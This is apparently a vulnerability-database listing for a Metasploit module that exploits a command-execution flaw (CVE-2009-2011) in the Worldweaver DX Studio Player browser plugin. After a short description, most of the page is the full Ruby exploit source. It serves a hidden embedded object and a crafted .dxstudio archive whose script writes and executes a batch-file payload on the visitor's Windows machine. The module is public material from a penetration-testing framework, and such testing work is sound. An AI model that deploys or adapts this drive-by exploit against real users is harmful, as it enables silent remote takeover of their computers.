Worldweaver DX Studio Player shell.execute() Command Execution

1976-01-01T00:00:00
ID MSF:EXPLOIT/WINDOWS/BROWSER/DXSTUDIO_PLAYER_EXEC
Type metasploit
Reporter Rapid7
Modified 1976-01-01T00:00:00

Description

This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver for versions 3.0.29 and earlier. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to local files!

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Worldweaver DX Studio Player shell.execute() Command Execution',
      'Description'    => %q{
        This module exploits a command execution vulnerability within the DX
        Studio Player from Worldweaver for versions 3.0.29 and earlier. The
        player is a browser plugin for IE (ActiveX) and Firefox (dll). When an
        unsuspecting user visits a web page referring to a specially crafted
        .dxstudio document, an attacker can execute arbitrary commands.

        Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20
        and IE 6 on Windows XP SP3. In IE, the user will be prompted if they
        wish to allow the plug-in to access local files. This prompt appears to
        occur only once per server host.

        NOTE: This exploit uses additionally dangerous script features to write
        to local files!
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-2011' ],
          [ 'BID', '35273' ],
          [ 'OSVDB', '54969' ],
          [ 'EDB', '8922' ],
          [ 'URL', 'http://dxstudio.com/guide.aspx' ]
        ],
      'Payload'        =>
        {
          'Space'    => 2048,
        },
      'Platform'       => 'win',
      # 'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DisclosureDate' => 'Jun 09 2009',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)

    url_base =  "http://"
    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url_base += ":" + datastore['SRVPORT'].to_s + get_resource()

    payload_url = url_base + "/payload"

    # handle request for the payload
    if (request.uri.match(/payload/))

      # build the payload
      return if ((p = regenerate_payload(cli)) == nil)

      cmds = generate_cmdstager({:linemax => 2047}, p)
      scr = ""
      cmds.each { |ln|
        scr << "f.writeString('"
        scr << ln
        scr << "\\n');\n"
      }

      # make header.xml
      hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
      hdrxml.gsub!(/CMDS/, scr);
      bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
      hdrxml.gsub!(/BATNAME/, bat_name);

      # craft the zip archive
      zip = Rex::Zip::Archive.new
      zip.add_file("header.xml", hdrxml)
      data = zip.pack

      print_status("Sending file.dxstudio payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

      # Handle the payload
      # handler(cli)
      return
    end

    # otherwise, send the html..
    html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

    print_status("Sending #{self.name} HTML")
    # Transmit the compressed response to the client
    html.gsub!(/DXURL/, payload_url)
    send_response(cli, html, { 'Content-Type' => 'text/html' })

  end
end

=begin
TODO:
- make it more quiet
- auto-migrate?
=end